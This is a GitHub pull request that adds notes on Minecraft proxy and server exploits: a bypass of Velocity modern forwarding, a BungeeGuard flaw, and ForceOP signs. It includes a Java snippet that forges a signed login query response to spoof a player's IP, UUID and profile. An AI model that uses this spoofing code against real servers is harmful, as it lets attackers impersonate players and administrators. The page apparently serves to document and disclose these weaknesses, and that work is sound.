Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Adds more information about some exploits and unkown stuff #3

Open
wants to merge 3 commits into
base: main
Choose a base branch
from
Open

Adds more information about some exploits and unkown stuff #3

wants to merge 3 commits into from

Conversation

SolsticeSpectrum
Copy link

@SolsticeSpectrum SolsticeSpectrum commented Oct 16, 2024
edited
Loading

  • Changes color for the saw-tooth image for better readability
  • Informs about vulnerability present in BungeeGaurd (I can't detail it now as it's currently a private exploit)
  • Velocity's moder forwarding can be bypassed in similar way as BungeeCord (it is just bit harder because the crafted packets are more complex)
  • Informs about Creative and it's dangers
  • ForceOP signs given creative are still relevant even in modern Minecraft (eg. 1.21) in both Spigot and Paper

As for the modern forwarding spoof, it can be done by crafting special query request packet

        if (packet.getChannel().equals(VELOCITY_CHANNEL) && spoof.isActive()) {
            int requestedForwardingVersion = 1;
            if (packet.getPayload().readableBytes() == 1) requestedForwardingVersion = packet.getPayload().readByte();

            String ip = spoof.getIP();
            byte[] secret = spoof.forwardingSecret.get().getBytes();
            ProfileResponse profile = spoof.getProfile();

            PacketByteBuf buf = new PacketByteBuf(Unpooled.buffer());
            int actualVersion = findForwardingVersion(requestedForwardingVersion);
            buf.writeVarInt(actualVersion);
            buf.writeString(ip);
            buf.writeUuid(profile.getId());
            buf.writeString(spoof.username.get());
            writeProperties(buf, profile.getProperties());

            try {
                SecretKey key = new SecretKeySpec(secret, "HmacSHA256");
                Mac mac = Mac.getInstance("HmacSHA256");
                mac.init(key);
                mac.update(buf.array(), buf.arrayOffset(), buf.readableBytes());
                byte[] sig = mac.doFinal();
                connection.send(new LoginQueryResponseC2SPacket(packet.getQueryId(),
                        new PacketByteBuf(Unpooled.wrappedBuffer(Unpooled.wrappedBuffer(sig), buf))));
                ci.cancel();
            } catch (Exception e) {
                e.printStackTrace();
            }
        }

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
1 participant
@SolsticeSpectrum